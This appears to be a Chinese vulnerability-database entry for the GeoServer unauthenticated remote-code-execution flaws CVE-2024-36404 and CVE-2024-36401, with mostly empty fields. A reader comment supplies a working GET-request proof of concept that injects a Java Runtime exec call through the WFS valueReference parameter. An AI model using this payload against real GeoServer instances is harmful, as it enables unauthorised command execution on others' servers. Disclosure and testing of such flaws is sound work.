GeoServer 未授权 RCE(CVE-2024-36404 & CVE-2024-36401)

基本字段

漏洞编号:
SSV-99854
披露/发现时间:
未知
提交时间:
2024-07-03
漏洞等级:
漏洞类别:
代码执行
影响组件:
GeoServer
(影响版本较多,点击查看)
漏洞作者:
未知
提交者:
Knownsec
CVE-ID:
CVE-2024-36404、CVE-2024-36401
CNNVD-ID:
补充
CNVD-ID:
补充
ZoomEye Dork:
补充

来源

漏洞详情

贡献者 共获得  0KB
Loading icon
共 0  兑换了

PoC

暂无 PoC

参考链接

解决方案

临时解决方案

暂无临时解决方案

官方解决方案

暂无官方解决方案

防护方案

暂无防护方案

人气 7073
评论前需绑定手机 现在绑定

全部评论 (1)

  • GET方法的POC: ```sh GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),'touch%20/tmp/success1') HTTP/1.1 Host: your-ip:8080 Accept-Encoding: gzip, deflate, br Accept: */* Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36 Connection: close Cache-Control: max-age=0 ```
    1F

※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负